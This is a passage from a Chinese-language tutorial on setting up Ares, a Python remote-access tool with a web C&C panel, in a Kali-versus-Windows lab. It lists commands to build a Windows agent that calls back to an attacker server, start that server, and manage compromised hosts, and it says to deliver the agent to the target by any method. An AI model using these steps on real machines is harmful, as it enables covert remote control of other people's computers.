C&C远控工具：Ares

DarkEye 安全工具 2019-04-22 09:30:38

559558

导语：这篇文章，我们将来学习Ares这款工具。这款工具可以通过web界面进行C&C控制。

这篇文章，我们将来学习Ares这款工具。这款工具可以通过web界面进行C&C控制。该工具在GitHub可以下载，地址在这里。

介绍

Ares是一款Python编写的远程访问工具。Ares由两部分主要程序组成：C&C服务器和客户端，C&C服务器是管理客户端代理的web界面，客户端需要运行在被入侵的主机上，并且确保能够与C&C服务器通信。

下面进行实战演示

· 攻击机：kali Linux

· 靶机：Windows10

安装

首先，我们需要在攻击机中安装此工具。我们可以使用git命令，直接在GitHub中将工具下载到本机。下载好后，我们使用cd命令切换到该目录下，如下图所示：

git clone //github.com/sweetsoftware/Ares.git
cd Ares
ls

要想让此工具正常运行，我们还需要安装一些依赖和库。可以看到在此工具目录下有一个requirement.txt文件，这个文件包含了我们需要安装的Python库。使用pip命令来安装：

pip install -r requirements.txt

因为我们的靶机是Windows主机，所以我们需要编译客户端来兼容Windows主机。要进行编译的话，我们还需要wine这个工具，不用担心，这个工具在我们下载Ares时已经提供了，现在我们来安装一下，可能会需要一点时间

ls
./wine_setup.sh

攻击目标

现在我们已经成功地安装好了运行Ares工具所需的所有依赖和库。接下来我们就可以利用该工具来获得C&C会话了。我们需要一个客户端，使用cd命令切换到客户端目录下，然后ls一下查看目录中的文件，可以看到有一个config文件，我们需要编辑这个文件来获取会话

cd agent/
ls
nano config.py

当我们使用nano命令打开配置文件时，可以看到SERVER变量是一个IP地址，这个地址是需要修改的。这里我们把它修改成攻击机的内网IP地址，在这个演示中，攻击机的内网IP地址是192.168.1.4。其他地方不需要再修改了，保存文件即可。

现在，我们已经对配置文件进行了修改，接下来就是创建客户端了。因为靶机是Windows，所以我们需要创建一个Windows客户端，使用下面的命令来创建：

./builder.py -p Windows –server //192.168.1.4:8080 -o agent.exe

接着，我们需要把这个客户端发送到靶机中，不管用什么方法都行。发送成功之后，我们需要启动服务器，因为客户端需要与服务器进行通信。启动服务器后，我们回到Ares目录，会发现多了一个server子目录。我们进入到该子目录，接着我们需要开启数据库，这里我们要用到initdb参数，只有在第一次使用时才需要开启数据库。现在，我们可以运行服务器了。

命令如下

ls
cd server/
./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

接着，我们在浏览器中访问我们的服务器IP地址。我们可以看到一个表单，要求我们设置密码，如下图，我们开始设置自己的密码，然后点击Define进行确认。

OK，密码已经创建好了，我们需要输入密码来登录，如图：

登录成功之后，我们可以看到Ares GUI界面。该页面中有以下几个链接：修改密码，断开连接，和客户端列表。现在客户端列表是空的，我们需要在靶机中执行了客户端之后，这个客户端列表才会有内容，如图：

在靶机中执行客户端后，我们在下图中可以看到，有一个客户端上线了。我们可以看到客户端的名称，状态和登录的用户名，还有主机名。我们还能清楚的看到靶机的IP地址和操作系统。当然，我们可以在多个设备中运行客户端，然后在客户端列表中都能一一显示出来。我们可以从多个客户端会话中选择某些会话，然后同时对多个会话执行相同的命令。选择会话名称继续：